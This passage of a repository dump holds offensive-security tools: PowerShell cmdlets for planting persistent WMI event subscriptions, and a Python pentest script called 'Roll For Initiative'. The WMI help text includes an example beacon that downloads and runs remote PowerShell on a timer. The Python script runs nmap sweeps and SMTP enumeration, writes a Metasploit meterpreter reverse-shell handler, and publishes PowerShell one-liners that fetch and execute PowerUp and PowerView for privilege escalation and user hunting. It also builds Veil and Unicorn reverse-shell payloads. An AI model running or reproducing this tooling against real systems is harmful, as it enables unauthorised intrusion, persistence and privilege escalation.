[void]$Filters.Add($(Get-WmiObject -Namespace root/subscription -Class $($FilterId.Split('.')[0]) @Arguments)) 117 | } 118 | New-Object PSObject @{ 119 | LocalEvents = $LocalEvents 120 | PermanentEvents = $PermanentEvents 121 | Filters = $Filters 122 | Consumers = $Consumers 123 | } 124 | } 125 | 126 | if($Local){ 127 | if($ComputerName){ 128 | Write-Warning 'Cannot query remote hosts for local WMI event.' 129 | }else{ 130 | Get-EventSubscriber 131 | } 132 | } 133 | if($Permanent){ 134 | Get-WmiObject -Class __FilterToConsumerBinding -Namespace root/subscription @Arguments 135 | } 136 | if($Consumer){ 137 | Get-WmiObject -Class __EventConsumer -Namespace root/subscription @Arguments 138 | } 139 | if($Filter){ 140 | Get-WmiObject -Class __EventFilter -Namespace root/subscription @Arguments 141 | } 142 | } 143 | 144 | function Add-WMIPermanentEvent { 145 | <# 146 | .SYNOPSIS 147 | 148 | Adds a region permanent WMI event using __FilterToConsumerBinding, __EventFilter, and __EventConsumer WMI classes. 149 | 150 | .DEFINITION 151 | 152 | This cmdlet takes command or script and a filter then creates a WMI Filter, Consumer, and FilterToConsumerBinding. 153 | A number of WMI filters, or triggers, are configured and are specified with the 'trigger' parameter. There are two consumers 154 | to choose from, command and script. 155 | 156 | .PARAMETER Command 157 | 158 | Indicates that an operating system command will be executed once the specified WMI event occurs. Provide a string or scriptblock 159 | containing the command you would like to run. 160 | 161 | .PARAMETER Script 162 | 163 | Indicates that a provided Jscript or VBScript will run once a WMI event occurs. Provide a string or scriptblock containing 164 | the script code you would like executed. 165 | 166 | .PARAMETER Trigger 167 | 168 | Specifies the event trigger (WMI Filter) to use. The options are InsertUSB, UserLogin, ProcessStart, Interval, and Timed. 169 | 170 | .PARAMETER EventName 171 | 172 | Specifies an arbitrary name to be assigned to the new permanent WMI event. 173 | 174 | .PARAMETER UserName 175 | 176 | Specifies the username that the UserLogin trigger will generate a WMI event for (optional). 177 | 178 | .PARAMETER ProcessName 179 | 180 | Specifies the process name when the ProcessStart trigger is selected (required). 181 | 182 | .PARAMETER IntervalPeriod 183 | 184 | Specifies the interval period when the Interval trigger is selected (required). 185 | 186 | .PARAMETER ExecutionTime 187 | 188 | Specifies the absolute time to generate a WMI event when the Timed trigger is selected (required). 189 | 190 | .PARAMETER ComputerName 191 | 192 | Specifies the remote computer system to add a permanent WMI event to. The default is the local computer. 193 | 194 | Type the NetBIOS name, an IP address, or a fully qualified domain name (FQDN) of one or more computers. To specify the local computer, type the computer name, a dot (.), or localhost. 195 | 196 | .PARAMETER Credential 197 | 198 | The credential object used to authenticate to the remote system. If not specified, the current user instance will be used. 199 | 200 | .EXAMPLE 201 | 202 | PS C:\>Add-WMIPermanentEvent -EventName KillProc -Command "Powershell.exe -NoP -C `"Stop-Process -Id %ProcessId% -Force`"" -Trigger ProcessStart -ProcessName powershell.exe 203 | 204 | 205 | 206 | .EXAMPLE 207 | 208 | PS C:\>Add-WMIPermanentEvent -EventName DLThumbdrive -Script "" -Trigger InsertUSB 209 | 210 | .EXAMPLE 211 | 212 | PS C:\>Add-WMIPermanentEvent -EventName NotifyUponLogin -Command "cmd.exe /c `"ping 192.168.50.11`"" -Trigger UserLogin -UserName administrator 213 | 214 | .EXAMPLE 215 | 216 | PS C:\>Add-WMIPermanentEvent -EventName CheckIn -Command "powershell.exe -NoP -C IEX (New-Object Net.WebClient).DownloadString('http://10.10.10.10/checkin.html')" -Trigger Interval -IntervalPeriod 10000 217 | 218 | .EXAMPLE 219 | 220 | PS C:\>Add-WMIPermanentEvent -EventName ExecuteSystemCheck -Script " 229 | 230 | Param ( 231 | [Parameter(Mandatory = $True, ParameterSetName = 'Command')] 232 | [String] 233 | [ValidateNotNullOrEmpty()] 234 | $Command, 235 | 236 | [Parameter(Mandatory = $True, ParameterSetName = 'Script')] 237 | [String] 238 | $Script, 239 | 240 | [Parameter(Mandatory = $True, ParameterSetName = 'Command')] 241 | [Parameter(Mandatory = $True, ParameterSetName = 'Script')] 242 | [String] 243 | [ValidateNotNullOrEmpty()] 244 | $EventName, 245 | 246 | [Parameter(Mandatory = $True, ParameterSetName = 'Command')] 247 | [Parameter(Mandatory = $True, ParameterSetName = 'Script')] 248 | [ValidateSet('InsertUSB', 'UserLogin', 'ProcessStart', 'Interval', 'Timed')] 249 | [String] 250 | [ValidateNotNullOrEmpty()] 251 | $Trigger, 252 | 253 | [String] 254 | $UserName, 255 | 256 | [String] 257 | $ProcessName, 258 | 259 | [String] 260 | $IntervalPeriod, 261 | 262 | [String] 263 | $ExecutionTime, 264 | 265 | [String] 266 | $ComputerName, 267 | 268 | [Management.Automation.PSCredential] 269 | $Credential 270 | ) 271 | 272 | #Error Checking 273 | if(($Trigger -eq 'ProcessStart') -and !$ProcessName){ 274 | Write-Warning 'A Process Name Must Be Specified.' 275 | return 276 | } 277 | if(($Trigger -eq 'Interval') -and !$IntervalPeriod){ 278 | Write-Warning 'An Interval Period Must Be Specified.' 279 | } 280 | if(($Trigger -eq 'Timed') -and !$ExecutionTime){ 281 | Write-Warning 'An Execution Time Must Be Specified.' 282 | } 283 | 284 | #Build optional argument splat if a remote system is specified 285 | $Arguments = @{} 286 | 287 | if ($ComputerName){ 288 | $Arguments['ComputerName'] = $ComputerName 289 | if ($Credential){ 290 | $Arguments['Credential'] = $Credential 291 | } 292 | } 293 | 294 | ###################################################### 295 | ### Consumer Setup, query, and variable assignment ### 296 | ###################################################### 297 | 298 | switch ($PsCmdlet.ParameterSetName) { 299 | #Build Command Line Consumer object if -Command is used 300 | 'Command' { 301 | $CommandConsumerArgs = @{ 302 | Name = $EventName 303 | CommandLineTemplate = $Command 304 | } 305 | $Consumer = Set-WmiInstance -Namespace root/subscription -Class CommandLineEventConsumer -Arguments $CommandConsumerArgs @Arguments 306 | } 307 | #Build Active Script Consumer object if -Script is used 308 | 'Script' { 309 | $ScriptConsumerArgs = @{ 310 | Name = $EventName 311 | ScriptText = $Script 312 | } 313 | $Consumer = Set-WmiInstance -Namespace root/subscription -Class ActiveScriptEventConsumer -Arguments $ScriptConsumerArgs @Arguments 314 | } 315 | } 316 | 317 | Switch ($Trigger){ 318 | 'InsertUSB' {$Query = 'SELECT * FROM Win32_VolumeChangeEvent WHERE EventType = 2' } 319 | 'UserLogin' {if ($UserName){ 320 | $Query = "SELECT * FROM __InstanceCreationEvent WITHIN 10 WHERE TargetInstance ISA 'Win32_LoggedOnUser' AND TargetInstance.__RELPATH like `"%Name=\\\`"$UserName%`"" 321 | }else{ 322 | $Query = "SELECT * FROM __InstanceCreationEvent WITHIN 10 WHERE TargetInstance ISA 'Win32_LogonSession' AND TargetInstance.LogonType = 2" 323 | }} 324 | 'Interval' {$Query = ""} 325 | 'DateTime' {$Query = ""} 326 | 'ProcessStart' {$Query = "SELECT * FROM Win32_ProcessStartTrace WHERE ProcessName='$ProcessName'";write-host $Query} 327 | 'LockedScreen' {$Query = "SELECT * FROM Win32_ProcessStartTrace WHERE ProcessName = 'LogonUI.exe'"} 328 | } 329 | 330 | #################################################### 331 | ### Filter Setup, query, and variable assignment ### 332 | #################################################### 333 | 334 | $EventFilterArgs = @{ 335 | EventNamespace = 'root/cimv2' 336 | Name = $EventName 337 | Query = $Query 338 | QueryLanguage = 'WQL' 339 | } 340 | 341 | $Filter = Set-WmiInstance -Namespace root/subscription -Class __EventFilter -Arguments $EventFilterArgs @Arguments 342 | 343 | $FilterToConsumerArgs = @{ 344 | Filter = $Filter 345 | Consumer = $Consumer 346 | } 347 | 348 | ################################## 349 | ### Filter to Consumer Binding ### 350 | ################################## 351 | Set-WmiInstance -Namespace root/subscription -Class __FilterToConsumerBinding -Arguments $FilterToConsumerArgs @Arguments 352 | } 353 | 354 | function Remove-WMIEvent { 355 | 356 | <# 357 | .SYNOPSIS 358 | 359 | Removes WMI __FilterToConsumerBinding, __EventFilter, and __EventConsumer objects as well as local events. 360 | 361 | .DEFINITION 362 | 363 | This cmdlet will remove any WMI event object(s) piped to it. After removing a __FilterToConsumerBinding object, this 364 | cmdlet will also remove associated __EventFilter and __EventConsumer objects. 365 | 366 | .PARAMETER InputObject 367 | 368 | Indicates that WMI local events are returned with the results of the command. 369 | 370 | .PARAMETER ComputerName 371 | 372 | Specifies the remote computer system to add a permanent WMI event to. The default is the local computer. 373 | 374 | Type the NetBIOS name, an IP address, or a fully qualified domain name (FQDN) of one or more computers. To specify the local computer, type the computer name, a dot (.), or localhost. 375 | 376 | .PARAMETER Credential 377 | 378 | The credential object used to authenticate to the remote system. If not specified, the current user instance will be used. 379 | 380 | .EXAMPLE 381 | 382 | PS C:\>Get-WMIEvent -Permanent | Remove-WMIEvent 383 | 384 | This command will remove each WMI __FilterToConsumerBinding object and their associated __EventFilter and __EventConsumer objects. 385 | 386 | .EXAMPLE 387 | 388 | PS C:\>$(Get-WmiObject -Namespace root/subscription -Class __EventFilter)[0] | Remove-WMIEvent 389 | 390 | This command will remove the first result after querying WMI __EventFilter objects. 391 | 392 | .EXAMPLE 393 | 394 | PS C:\>Get-EventSubscriber | Remove-WMIEvent 395 | 396 | This command will remove any local WMI events. 397 | 398 | .INPUTS 399 | 400 | System.Object.PSEventSubscriber, System.Management.ManagementBaseObject.ManagementObject 401 | 402 | You can pipe one or more WMI event objects to this cmdlet. 403 | 404 | #> 405 | 406 | Param ( 407 | [Parameter(Mandatory = $True, ValueFromPipeline = $True, ParameterSetName = 'Pipeline')] 408 | $InputObject, 409 | 410 | [String] 411 | $ComputerName, 412 | 413 | [Management.Automation.PSCredential] 414 | $Credential 415 | ) 416 | 417 | Begin { 418 | #Build optional argument splat if a remote system is specified 419 | $Arguments = @{} 420 | 421 | if($ComputerName){ 422 | $Arguments['ComputerName'] = $ComputerName 423 | if ($Credential){ 424 | $Arguments['Credential'] = $Credential 425 | } 426 | } 427 | } 428 | 429 | Process { 430 | foreach ($Event in $InputObject){ 431 | if($($Event.GetType().Name) -eq 'PSEventSubscriber'){ 432 | $Event | Unregister-Event 433 | }elseif($Event.__CLASS -eq '__FilterToConsumerBinding'){ 434 | $ConsumerId = $Event.Consumer 435 | $FilterId = $Event.Filter 436 | $Event | Remove-WmiObject 437 | Get-WmiObject -Namespace root/subscription -Class $ConsumerId.Split('.')[0] -Filter "__RELPATH='$ConsumerId'" @Arguments | Remove-WmiObject 438 | Get-WmiObject -Namespace root/subscription -Class $FilterId.Split('.')[0] -Filter "__RELPATH='$FilterId'" @Arguments | Remove-WmiObject 439 | }else{ 440 | $Event | Remove-WmiObject 441 | } 442 | } 443 | } 444 | 445 | End { 446 | 447 | } 448 | 449 | } 450 | -------------------------------------------------------------------------------- /Roll For Initiative/RFI.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | # Andrew Luke @sw4mp_f0x 3 | # ToDo: 4 | # Standalone scan option for at least ping sweep. 5 | # Check for live-hosts before ping-sweep and ask if you still want to run. 6 | # 7 | # 8 | # Todo: 9 | # - Add ssh and telnet brute forcing 10 | # - Add NFSulator 11 | # - Implement new webinterface tool 12 | # - Automate excludes checking 13 | # - 14 | 15 | 16 | import sys 17 | import subprocess 18 | import os 19 | import logging 20 | import shutil 21 | 22 | 23 | def setup(): 24 | # Check for client folder. Create if it does not exist 25 | clients_path = "/root/Clients/" 26 | if not os.path.exists(clients_path): 27 | os.makedirs(clients_path) 28 | Client = raw_input("Client name: ") 29 | global client_folder 30 | client_folder = clients_path + Client + "/" 31 | if not os.path.exists(client_folder): 32 | os.makedirs(client_folder) 33 | 34 | 35 | #Check for required files 36 | while not os.path.exists(client_folder + "scope.txt"): 37 | create_scope = raw_input( 38 | "A list of IP addresses or IP ranges needs to be definied within %s. Hit enter when completed..." % ( 39 | client_folder + "scope.txt")) 40 | while not os.path.exists(client_folder + "excludes.txt"): 41 | create_scope = raw_input( 42 | "A list of IP addresses or IP ranges needs to be definied within %s, even if it is empty. Hit enter when completed..." % ( 43 | client_folder + "excludes.txt")) 44 | 45 | log_file = raw_input("Define log file location:[%s] " % (client_folder + Client + ".log")) 46 | if not log_file: 47 | log_file = client_folder + Client + ".log" 48 | logging.basicConfig(filename=log_file, format='%(asctime)s %(message)s', level=logging.INFO, 49 | datefmt='%m/%d/%Y %I:%M:%S %p -') 50 | 51 | 52 | def execute(selection): 53 | options = {"1": kickoff, 54 | "2": web_interfaces, 55 | "3": service_scan, 56 | "4": pentest_setup 57 | } 58 | options[selection]() 59 | 60 | 61 | def kickoff(): 62 | # Ping-Sweep 63 | print "====================================" 64 | print "Beginning Kickoff Scan" 65 | print "====================================" 66 | logging.info("Beginning Ping Sweep") 67 | ping_sweep = subprocess.Popen([ 68 | 'nmap -sn -v10 -T4 --open -iL %sscope.txt --excludefile %sexcludes.txt -oG %sping-sweep --stats-every 1m' % ( 69 | client_folder, client_folder, client_folder)], shell=True) 70 | ping_sweep.wait() 71 | logging.info("Ping Sweep Complete") 72 | file_to_parse = open('%sping-sweep' % (client_folder)) 73 | export_file = open('%slive-hosts.txt' % (client_folder), 'wb') 74 | for line in file_to_parse: 75 | if "Up" in line: 76 | export_file.write('%s\n' % (line.split()[1])) 77 | file_to_parse.close() 78 | export_file.close() 79 | 80 | livehosts = open('%slive-hosts.txt' % (client_folder)) 81 | for host in livehosts: 82 | global LiveHostCount 83 | LiveHostCount += 1 84 | export_file.close() 85 | 86 | # Check for exclusions within live-hosts 87 | print "\n\nRFI found %s live hosts on the network." % (LiveHostCount) 88 | check = raw_input("Check that the exclusions were actually excluded and then press [Enter] to continue...") 89 | 90 | # Targetted Port Scans 91 | print "====================================" 92 | print "Beginning Targetted Service Scans" 93 | print "====================================" 94 | 95 | logging.info("Beginning Targeted Port Scan") 96 | ports = ["22", "23", "53", "389", "686", "2049", "5800,5900-5920", "5985", "10000"] 97 | ports_NSE = ["445", "21", "25", "1433", "3306", "80"] 98 | 99 | for port in ports: 100 | logging.info("Scanning port %s." % (port)) 101 | targetted_ports = subprocess.Popen([ 102 | 'nmap -Pn -n -p%s -sV --open -oA %s%s -v10 --stats-every 1m -iL %slive-hosts.txt' % ( 103 | port, client_folder, port, client_folder)], shell=True) 104 | targetted_ports.wait() 105 | 106 | for port in ports_NSE: 107 | logging.info("Scanning port %s." % (port)) 108 | targetted_ports_with_NSE = subprocess.Popen([ 109 | 'nmap -Pn -n -p%s -sV -sC --open -oA %s%s -v10 --stats-every 1m -iL %slive-hosts.txt' % ( 110 | port, client_folder, port, client_folder)], shell=True) 111 | targetted_ports_with_NSE.wait() 112 | 113 | logging.info("Targeted Port Scan Complete") 114 | 115 | if not os.path.exists(client_folder + "Finals"): 116 | os.makedirs(client_folder + "Finals") 117 | 118 | file_to_parse = open('%s23.gnmap' % (client_folder)) 119 | export_file = open('%sFinals/TelnetList.txt' % (client_folder), 'wb') 120 | for line in file_to_parse: 121 | if "telnet?" not in line and "print" not in line and "JetDirect" not in line and "#" not in line and "tcpwrapped" not in line and "Ricoh" not in line and "Up" not in line and "APC" not in line and "Pocket" not in line: 122 | export_file.write('%s\n' % (line.split()[1])) 123 | file_to_parse.close() 124 | export_file.close() 125 | 126 | file_to_parse = open('%s445.gnmap' % (client_folder)) 127 | export_file = open('%s445.txt' % (client_folder), 'wb') 128 | for line in file_to_parse: 129 | if "Up" in line: 130 | export_file.write('%s\n' % (line.split()[1])) 131 | file_to_parse.close() 132 | export_file.close() 133 | 134 | 135 | print "====================================" 136 | print "Beginning SMTP Open Relay" 137 | print "and Enumeration NSE scripts" 138 | print "====================================" 139 | file_to_parse = open('%s25.gnmap' % (client_folder)) 140 | export_file = open('%ssmtprelay.txt' % (client_folder), 'wb') 141 | for line in file_to_parse: 142 | if "telnet?" not in line and "print" not in line and "JetDirect" not in line and "#" not in line and "tcpwrapped" not in line and "Ricoh" not in line and "Up" not in line and "APC" not in line and "Pocket" not in line: 143 | export_file.write('%s\n' % (line.split()[1])) 144 | file_to_parse.close() 145 | export_file.close() 146 | 147 | logging.info("Checking for open relays") 148 | open_relay = subprocess.Popen([ 149 | 'nmap -Pn --script smtp-open-relay.nse -p 25,465,587 --open -iL %ssmtprelay.txt -oA %sFinals/SMTP_Relay' % ( 150 | client_folder, client_folder)], shell=True) 151 | open_relay.wait() 152 | logging.info("Open relay check complete") 153 | 154 | logging.info("Checking for SMTP enum") 155 | open_relay = subprocess.Popen([ 156 | 'nmap -Pn --script smtp-enum-users.nse -p 25,465,587 --open -iL %ssmtprelay.txt -oA %sFinals/SMTP_Enum' % ( 157 | client_folder, client_folder)], shell=True) 158 | open_relay.wait() 159 | logging.info("SMTP enum check complete") 160 | os.remove("%ssmtprelay.txt" % (client_folder)) 161 | 162 | global message 163 | message = "Kickoff scans complete" 164 | 165 | 166 | def web_interfaces(): 167 | print "====================================" 168 | print "Beginning Rawr Scan" 169 | print "====================================" 170 | logging.info("Starting Nmap web scan") 171 | web_scan = subprocess.Popen([ 172 | 'nmap -sV --open -T4 -v7 -p80,280,443,591,593,981,1311,2031,2480,3181,4444,4445,4567,4711,4712,5104,5280,7000,7001,7002,8000,8008,8011,8012,8013,8014,8042,8069,8080,8081,8243,8280,8281,8443,8531,8887,8888,9080,9443,11371,12443,16080,18091,18092 -iL %slive-hosts.txt -oA %sweb' % ( 173 | client_folder, client_folder)], shell=True) 174 | web_scan.wait() 175 | logging.info("Nmap web scan complete") 176 | 177 | logging.info("Starting Rawr") 178 | rawr_proc = subprocess.Popen(["python %s -f %sweb.xml -d %s" % (rawr_folder, client_folder, client_folder)], 179 | shell=True) 180 | rawr_proc.wait() 181 | logging.info("Rawr complete") 182 | 183 | global message 184 | message = "Rawr complete" 185 | 186 | 187 | def service_scan(): 188 | print "====================================" 189 | print "Beginning Service Scan" 190 | print "====================================" 191 | logging.info("Starting service scan") 192 | service_scan = subprocess.Popen( 193 | ['nmap -sV --open -iL %slive-hosts.txt -v10 -T4 -oA %ssvc-scan' % (client_folder, client_folder)], shell=True) 194 | service_scan.wait() 195 | logging.info("Service scan complete") 196 | 197 | global message 198 | message = "Service scan complete" 199 | 200 | 201 | def pentest_setup(): 202 | import boost 203 | print "====================================" 204 | print "Setting up pentest files" 205 | print "====================================" 206 | ip = raw_input("Enter LHOST> ") 207 | bounce = open('/bounce', "w") 208 | bounce.write('''use exploit/multi/handler 209 | jobs -K 210 | set payload windows/meterpreter/reverse_tcp 211 | set exitonsession false 212 | set lport 53 213 | set enablestageencoding true 214 | set autorunscript migrate -f 215 | set LHOST %s 216 | exploit -j -z 217 | set payload windows/meterpreter/reverse_https 218 | set lport 443 219 | exploit -j -z''' % (ip)) 220 | 221 | bool = False 222 | while not bool: 223 | kali2 = raw_input("Are you using Kali 2? [y/n]: ") 224 | global cmd_path 225 | if kali2 is "n": 226 | cmd_path = "/var/www/cmd.html" 227 | bool = True 228 | elif kali2 is "y": 229 | cmd_path = "/var/www/html/cmd.html" 230 | bool = True 231 | 232 | cmd_html = ('''Invoke-AllChecks

233 | powershell -nop -exec bypass -c "IEX (New-Object Net.WebClient).DownloadString('http://%s:8080/PowerUp.ps1'); Invoke-Allchecks" 234 |

235 | Write-UserAddServiceBinary

236 | powershell -nop -exec bypass -c "IEX (New-Object Net.WebClient).DownloadString('http://%s:8080/PowerUp.ps1'); Write-UserAddServiceBinary -ServiceName SQLRODBC" 237 |

238 | Invoke-ServiceUserAdd

239 | powershell -nop -exec bypass -c "IEX (New-Object Net.WebClient).DownloadString('http://%s:8080/PowerUp.ps1'); Invoke-ServiceUserAdd -ServiceName spooler" 240 |

241 | Invoke-FindLocalAdminAccess

242 | powershell -nop -exec bypass -c "IEX (New-Object Net.WebClient).DownloadString('http://%s:8080/powerview.ps1'); Invoke-FindLocalAdminAccess" 243 |

244 | Invoke-userhunter

245 | powershell -nop -exec bypass -c "IEX (New-Object Net.WebClient).DownloadString('http://%s:8080/powerview.ps1'); Invoke-userhunter" 246 |

247 | Invoke-ShareFinder

248 | powershell -nop -exec bypass -c "IEX (New-Object Net.WebClient).DownloadString('http://%s:8080/powerview.ps1'); Invoke-ShareFinder -CheckShareAccess -Verbose | Out-File -Encoding ascii found_shares.txt"''' % ( 249 | ip, ip, ip, ip, ip, ip)) 250 | 251 | cmd_file = open(cmd_path, "w") 252 | cmd_file.write(cmd_html) 253 | cmd_file.close() 254 | 255 | # Deleting old files 256 | if os.path.exists("/root/HTTPS_443r.exe"): 257 | os.remove("/root/HTTPS_443r.exe") 258 | if os.path.exists("/root/TCP_53r.exe"): 259 | os.remove("/root/TCP_53r.exe") 260 | if os.path.exists("/root/power443.txt"): 261 | os.remove("/root/power443.txt") 262 | if os.path.exists("/root/power53.txt"): 263 | os.remove("/root/power53.txt") 264 | if os.path.exists("/var/www/html/HTTPS_443.exe"): 265 | os.remove("/var/www/html/HTTPS_443.exe") 266 | if os.path.exists("/var/www/html/TCP_53.exe"): 267 | os.remove("/var/www/html/TCP_53.exe") 268 | if os.path.exists("/var/www/html/power443.txt"): 269 | os.remove("/var/www/html/power443.txt") 270 | if os.path.exists("/var/www/html/power53.txt"): 271 | os.remove("/var/www/html/power53.txt") 272 | 273 | 274 | # Build Veil Payloads 275 | TCPport = raw_input("Define TCP listening port:[53] ") 276 | if not TCPport: 277 | TCPport = '53' 278 | HTTPSport = raw_input("Define HTTPS listening port:[443] ") 279 | if not HTTPSport: 280 | HTTPSport = '443' 281 | payload_type = raw_input("Define payload type (python, ruby, both): ") 282 | payload_paths = [] 283 | devnull = open('/dev/null', 'w') 284 | if payload_type == "both": 285 | payload_paths.append(boost.BuildVeilTCP(ip, TCPport, 'Veil_TCP_' + TCPport, lang='ruby', pwnstaller=True, overwrite=True)) 286 | payload_paths.append(boost.BuildVeilTCP(ip, TCPport, 'Veil_TCP_' + TCPport, lang='python', pwnstaller=True, overwrite=True)) 287 | payload_paths.append(boost.BuildVeilHTTPS(ip, HTTPSport, 'Veil_HTTPS_' + HTTPSport, lang='ruby', pwnstaller=True, overwrite=True)) 288 | payload_paths.append(boost.BuildVeilHTTPS(ip, HTTPSport, 'Veil_HTTPS_' + HTTPSport, lang='python', pwnstaller=True, overwrite=True)) 289 | elif payload_type == "python": 290 | payload_paths.append(boost.BuildVeilTCP(ip, TCPport, 'Veil_TCP_' + TCPport, lang='python', pwnstaller=True, overwrite=True)) 291 | payload_paths.append(boost.BuildVeilHTTPS(ip, HTTPSport, 'Veil_HTTPS_' + HTTPSport, lang='python', pwnstaller=True, overwrite=True)) 292 | elif payload_type == "ruby": 293 | payload_paths.append(boost.BuildVeilTCP(ip, TCPport, 'Veil_TCP_' + TCPport, lang='ruby', pwnstaller=True, overwrite=False, stdout=devnull, stderr=devnull)) 294 | payload_paths.append(boost.BuildVeilHTTPS(ip, HTTPSport, 'Veil_HTTPS_' + HTTPSport, lang='ruby', pwnstaller=True, overwrite=False, stdout=devnull, stderr=devnull)) 295 | 296 | for path in payload_paths: 297 | shutil.copyfile(path, "/root/%s" % (path.split('/')[-1])) 298 | shutil.copyfile(path, "/var/www/html/%s" % (path.split('/')[-1])) 299 | 300 | # Build Unicorn Powershell HTTPS payload 301 | unicorn_https = subprocess.Popen( 302 | ['python /root/tools/unicorn/unicorn.py windows/meterpreter/reverse_https %s %s' % (ip, HTTPSport)], shell=True) 303 | unicorn_https.wait() 304 | shutil.copyfile("./powershell_attack.txt", "/root/Powershell_HTTPS_%s.txt" % (HTTPSport)) 305 | shutil.copyfile("./powershell_attack.txt", "/var/www/html/Powershell_HTTPS_%s.txt" % (HTTPSport)) 306 | update_cmd = open(cmd_path, "a") 307 | open_payload = open("./powershell_attack.txt", "r") 308 | unicorn_https_payload = open_payload.readlines() 309 | update_cmd.write('''

310 | Powershell HTTPS Payload

311 | %s''' % (unicorn_https_payload[0])) 312 | open_payload.close() 313 | 314 | # Build Unicorn Powershell HTTPS payload 315 | unicorn_tcp = subprocess.Popen( 316 | ['python /root/tools/unicorn/unicorn.py windows/meterpreter/reverse_tcp %s %s' % (ip, TCPport)], shell=True) 317 | unicorn_tcp.wait() 318 | shutil.copyfile("./powershell_attack.txt", "/root/Powershell_TCP_%s.txt" % (TCPport)) 319 | shutil.copyfile("./powershell_attack.txt", "/var/www/html/Powershell_TCP_%s.txt" % (TCPport)) 320 | open_payload = open("./powershell_attack.txt", "r") 321 | unicorn_tcp_payload = open_payload.readlines() 322 | update_cmd.write('''

323 | Powershell TCP Payload

324 | %s''' % (unicorn_tcp_payload[0])) 325 | update_cmd.close() 326 | open_payload.close() 327 | os.remove("./powershell_attack.txt") 328 | os.remove("./unicorn.rc") 329 | 330 | global message 331 | message = "Pentest setup complete" 332 | 333 | 334 | def ssh_telnet_brute(): 335 | logging.info("Scanning port %s." % (port)) 336 | targetted_ports = subprocess.Popen([ 337 | 'nmap -Pn -n -p%s -sV --open -oA %s%s -v10 --stats-every 1m -iL %slive-hosts.txt' % ( 338 | port, client_folder, port, client_folder)], shell=True) 339 | targetted_ports.wait() 340 | 341 | 342 | def main_menu(check=""): 343 | try: 344 | print("==========================================================") 345 | print("Roll For Initiative") 346 | print("By: @Sw4mp_f0x") 347 | print("==========================================================") 348 | print("") 349 | 350 | # Check for message, print message if present, clear out message 351 | if check: 352 | print(check) 353 | print("") 354 | global message 355 | message = "" 356 | 357 | print("Roll For Initiative Options:") 358 | print(" [1] Kickoff Scans") 359 | print(" [2] Web Interface Scan + Rawr") 360 | print(" [3] Nmap Service Scan") 361 | print(" [4] Pentest Setup") 362 | print("") 363 | selection = raw_input("Please select an option: ") 364 | if 1 <= int(selection) <= 5: 365 | execute(selection) 366 | else: 367 | raise ValueError('A very specific bad thing happened') 368 | except ValueError: 369 | unused_var = os.system("clear") 370 | main_menu("Invalid entry. Pick again.") 371 | 372 | 373 | 374 | if __name__ == "__main__": 375 | LiveHostCount = 0 376 | rawr_folder = "/root/tools/rawr/rawr.py" 377 | global cmd_path 378 | cmd_path = "" 379 | global message 380 | message = "" 381 | setup() 382 | 383 | try: 384 | while True: 385 | main_menu(message) 386 | unused_var = os.system("clear") 387 | except KeyboardInterrupt: 388 | print("Later!") 389 | 390 | --------------------------------------------------------------------------------